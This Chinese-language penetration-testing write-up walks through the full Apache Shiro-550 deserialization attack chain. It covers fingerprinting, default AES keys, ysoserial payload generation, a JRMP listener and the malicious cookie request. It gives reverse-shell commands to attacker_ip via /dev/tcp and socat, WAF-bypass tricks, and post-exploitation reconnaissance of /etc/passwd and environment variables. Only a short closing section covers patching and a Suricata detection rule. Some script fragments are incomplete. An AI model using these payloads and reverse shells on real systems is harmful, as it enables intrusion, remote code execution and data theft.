Shiro 550漏洞实战复盘:从指纹识别到一键GetShell的完整攻击链剖析
Shiro-550漏洞深度解析:从指纹识别到权限提升的完整攻防手册
在渗透测试领域,Apache Shiro框架的反序列化漏洞一直是红队工程师的"黄金门票"。2016年曝光的Shiro-550漏洞因其利用链稳定、影响范围广,至今仍是企业内网渗透的常见突破口。本文将彻底拆解这个经典漏洞的完整攻击链,不仅提供可复现的实战指南,更会揭示防御者视角的检测逻辑,帮助安全人员构建立体化的防护体系。
1. 漏洞环境与指纹识别
搭建符合真实业务场景的测试环境是漏洞研究的首要步骤。推荐使用以下Docker镜像快速部署漏洞环境:
docker pull medicean/vulapps:s_shiro_1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1指纹识别是漏洞利用的起点。Shiro框架的独特之处在于其会话管理机制,通过检查HTTP响应头中的Set-Cookie字段即可快速识别:
- 向目标发送包含任意
rememberMe值的Cookie请求 - 观察响应中是否出现
rememberMe=deleteMe特征 - 若存在该特征,则可确认目标使用Shiro框架
实际渗透中常遇到WAF拦截Cookie关键字的情况,此时可尝试大小写混淆(如
Remember-me)或URL编码绕过
2. 漏洞原理与技术内幕
Shiro-550漏洞的本质在于加密密钥硬编码问题。当用户勾选"记住我"功能时,Shiro会执行以下危险流程:
- 使用固定密钥
kPH+bIxk5D2deZiIxcaaaA==进行AES加密 - 序列化用户身份信息并存储在Cookie中
- 反序列化时未做任何安全检查
攻击者只需构造恶意的序列化数据,即可实现远程代码执行。下表对比了不同Shiro版本的密钥处理方式:
| 版本范围 | 密钥处理方式 | 风险等级 |
|---|---|---|
| ≤1.2.4 | 硬编码密钥 | 严重 |
| 1.2.5+ | 动态生成密钥 | 安全 |
| 定制版 | 可能修改默认密钥 | 需单独测试 |
3. 自动化探测与利用实战
3.1 密钥检测技术
使用Python脚本批量检测默认密钥是最有效的方法。关键代码如下:
from Crypto.Cipher import AES import base64 def check_key(target_url, key): try: cipher = AES.new(base64.b64decode(key), AES.MODE_CBC, iv) # 发送特制请求包验证密钥 return True if valid_response else False except: return False常见需要测试的密钥列表包括:
kPH+bIxk5D2deZiIxcaaaA==(最常用)2AvVhdsgUs0FSA3SDFAdag==3AvVhmFLUs0KTA3Kprsdag==
3.2 利用链构造技巧
完整的攻击流程需要组合多个工具:
生成Payload:
java -jar ysoserial.jar JRMPClient "your_command" | base64 -w 0搭建JRMP监听:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "bash -c {echo,base64_encoded_cmd}|{base64,-d}|{bash,-i}"发送恶意请求:
import requests headers = { 'Cookie': f'rememberMe={generated_payload}' } requests.get(target_url, headers=headers)
实际渗透中常遇到字符过滤,可通过以下方式绕过:
- 使用
${IFS}替代空格- 采用十六进制编码特殊字符
- 分块传输编码绕过WAF检测
4. 高级利用与权限维持
获得初始立足点后,红队工程师需要建立稳定的控制通道:
4.1 反弹Shell优化
原始反弹Shell容易中断,改进方案:
# 持久化Shell bash -i >& /dev/tcp/attacker_ip/4444 0>&1 & disown # 加密通道 socat TCP:attacker_ip:4444 OPENSSL:attacker_ip:5555,verify=04.2 内网渗透准备
收集以下信息为横向移动做准备:
/etc/passwd用户列表netstat -tulnp网络服务ps aux运行进程env环境变量
5. 防御策略与检测方案
企业安全团队应从多维度构建防护体系:
预防措施:
- 升级到Shiro 1.2.5+版本
- 自定义加密密钥(需确保强度)
- 禁用不必要的RememberMe功能
检测方案:
# Suricata检测规则 alert tcp any any -> any any (msg:"Shiro Deserialization Attempt"; content:"rememberMe="; depth:50; pcre:"/rO0AB[0-9a-zA-Z+/]+={0,2}/"; sid:1000001; rev:1;)应急响应:
- 立即隔离受影响服务器
- 审计所有使用Shiro的应用
- 排查可能的数据泄露
- 更新所有依赖组件版本
在实战中遇到过多次因字符编码导致的Payload失效问题,最终发现使用Java原生序列化配合Base64URL编码成功率最高。建议安全团队定期进行红蓝对抗演练,真实检验防御体系的有效性。